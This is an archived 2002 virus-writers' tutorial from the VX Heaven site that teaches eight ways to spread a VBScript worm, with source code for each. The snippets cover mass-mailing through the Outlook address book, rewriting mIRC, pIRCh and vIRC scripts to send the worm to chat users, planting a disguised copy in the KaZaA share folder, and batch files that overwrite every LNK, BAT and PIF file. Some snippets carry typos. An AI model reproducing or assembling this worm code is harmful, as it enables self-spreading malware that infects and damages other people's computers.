Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Perfect Internet-Worm via VisualBasic Script

SPTH
eBCVG #3
November 2002

[Back to index] [Comments]

Now i wanna show you 8 of the best VBS techniques to spread a worm...

  1. eMail spreading
  2. mIRC spreading
  3. pIRCh spreading
  4. vIRC spreading
  5. KaZaA spreading
  6. LNK dropping
  7. BAT dropping
  8. PIF dropping

1) eMail spreading

First you'll find the eMail-spreading-source:

Dim x
on error resume next
Set fso ="Scripting.FileSystem.Object"
Set so=CreateObject(fso)
Set ol=CreateObject("Outlook.Application")
Set out= WScript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For x=1 To a.AddressEntries.Count
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="Subject"
Mail.Body="Body"
Mail.Attachments.Add Wscript.ScriptFullName
Mail.Send
Next
ol.Quit
 

The Virus searchs for every email adress in the addressbook. Then sending itself to these addresses. It's really easy, I think.

2) mIRC spreading

The source first:

Dim mirc
set fso=CreateObject("Scripting.FileSystemObject")
set mirc=fso.CreateTextFile("C:\mirc\script.ini")
fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True
mirc.WriteLine "[script]"
mirc.WriteLine "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:\mirc\attachment.vbs }
mirc.Close

First The virus copies itself to C:\mirc\attachment.vbs Then it canges the mIRC-script.ini file. So every user in the same chatroom gets an infect file.

3) pIRCh spreading

Source:

Dim pirch
set fso=CreateObject("Scripting.FileSystemObject")
set mirc=fso.CreateTextFile("C:\pirch98\events.ini")
fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True
pirch.WriteLine "[Levels]");
pirch.WriteLine "Enabled=1");
pirch.WriteLine "Count=6");
pirch.WriteLine "Level1=000-Unknows"
pirch.WriteLine "000-UnknowsEnabled=1"
pirch.WriteLine "Level2=100-Level 100"
pirch.WriteLine "100-Level 100Enabled=1"
pirch.WriteLine "Level3=200-Level 200"
pirch.WriteLine "200-Level 200Enabled=1"
pirch.WriteLine "Level4=300-Level 300"
pirch.WriteLine "300-Level 300Enabled=1"
pirch.WriteLine "Level5=400-Level 400"
pirch.WriteLine "400-Level 400Enabled=1"
pirch.WriteLine "Level6=500-Level 500"
pirch.WriteLine "500-Level 500Enabled=1"
pirch.WriteLine "[000-Unknowns]"
pirch.WriteLine "User1=*!*@*"
pirch.WriteLine "UserCount=1"
pirch.WriteLine "Events1=ON JOIN:#: /dcc send $nick C:\Pirch98\attachement.vbs"
pirch.WriteLine "EventCount=1"
pirch.WriteLine "[100-Level 100]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.WriteLine "[200-Level 200]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.WriteLine "[300-Level 300]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.WriteLine "[400-Level 400]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.WriteLine "[500-Level 500]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.Close
 

It's the same as mIRC spreading. First the worm made a copy of itself in the pIRCh direction (C:\pirch98), then changes the event.ini file, so every user get an infect file.

4) vIRC spreading

VBS vIRC source:

set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\Virc\attachment.vbs", True
set shell=CreateObject("WScript.Shell")
shell RegWrite "HKEY_CURRENT_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17", "dcc send $nick C:\Virc\attachment.vbs"
 

It's a really short code. First you need a copy of the virus, than change a registry key. That's all...

5) KaZaA spreading

Source:

set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\Kazaa\Nirvana - You Know You Are Right.vbs", True
set shell=CreateObject("WScript.Shell")

shell.RegWrite "HKLM\\Software\\KaZaA\\Transfer\\DlDir0", "C:\Kazaa");
 

You make a copy of the virus in the C:\Kazaa-direction. Then make a registry-key. Every file in the direction (here it is "C:\kazaa") other user can download. I think, you will understand it.

6) LNK dropping

Dropping means, that every LNK file opens the virus. Look at the code:

Dim shell, msc, batch, fso
set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\vbs.lnk")
msc.TargetPath=shell.ExpandEnvironment("C:\vbs.vbs")
msc.WindowStyle=4
msc.Save
set batch=fso.CreateTextFile("C:\lnk.bat")
batch.WriteLine "cls"
batch.WriteLine "@echo off"
batch.WriteLine "for %%a in (*.lnk ..\*.lnk \*.lnk %path%\*.lnk %tmp%\*.lnk %temp%\*.lnk %windir%\*.lnk) do copy C:\vbs.lnk %%a"
batch.Close
shell.Run  "C:\lnk.bat"
 

First the virus makes a copy of itself to C:\vbs.vbs Then it generates a LNK file, which opens the C:\vbs.vbs-file. Then the virus makes a batch file, which copies the LNK-file to every LNK file it can find.

7) BAT dropping

Source first:

Dim shell, batcha, batchb, fso
set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True
set batcha=fso.CreateTextFile("C:\bat.bat")
batcha.WriteLine "cls"
batcha.WriteLine "@echo off"
batcha.WriteLine "cscript C:\vbs.vbs"
batcha.Close
set batchb=CreateTextFile("C:\bata.bat")
batchb.WriteLine "cls"
batchb.WriteLine "@echo off"
batchb.WriteLine "for %%a in (*.bat ..\*.bat \*.bat %path%\*.bat %tmp%\*.bat %temp%\*.bat %windir%\*.bat) do copy C:\bat.bat %%a"
batchb.Close
shell.Run  "C:\lnk.bat"
 

First the virus copies itself to C:\vbs.vbs. Than it generates a batch-file (C:\bat.bat) which opens the virus-copy. Than te virus generates a second batch file, which copies the first one to every batch-files it can find.

8) PIF dropping

PIF files open DOS-files. Yes, but VBS is a windows file?? what to do?

Source:

Dim shell, msc, batch, fso, batchb
set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True
set batch=CreateTextFile("C:\bat.bat")
batch.WriteLine "cls"
batch.WriteLine "@echo off"
batch.WriteLine "cscript C:\vbs.vbs"
batch.Close
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\pif.lnk")
msc.TargetPath=shell.ExpandEnvironment("C:\bat.bat")
msc.WindowStyle=4
msc.Save
set batchb=CreaateTextFile("C:\pif.bat")
batchb.WriteLine "cls"
batchb.WriteLine "@echo off"
batchb.WriteLine "for %%a in (*.pif ..\*.pif \*.pif %path%\*.pif %tmp%\*.pif %temp%\*.pif %windir%\*.pif) do copy C:\pif.pif %%a"
batchb.Close
shell.Run  "C:\pif.bat"
 

First the virus copies itself to C:\vbs.vbs. Than it generates a batch file, which opens the virus. Than it generates a PIF file, which opens the batch file. You can see, that the code should generates a LNK, but VBS "know" that BAT is a DOS file, so it makes a DOS-ShourtCut, and that's PIF. Ok, go on, the vbs file generates a second BAT file, which copies the PIF to every PIF-file, it can find.

Before starting writing this article, i don't really like to program in VBS, because I thought, it's a ScriptKiddy language. But after a while I liked it more and more, because I'm able to make really nice things like file-dropping or other stuff. I hope U also enjoyed reading this tutorial about VisualBasicScript.

- - - - - - - - - - -
SeCoNd PaRt To HeLl
www.spth.de.vu
[email protected]
written on 12.11.2002
- - - - - - - - - - -
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxer.org aka vx.netlux.org
deenesitfrplruua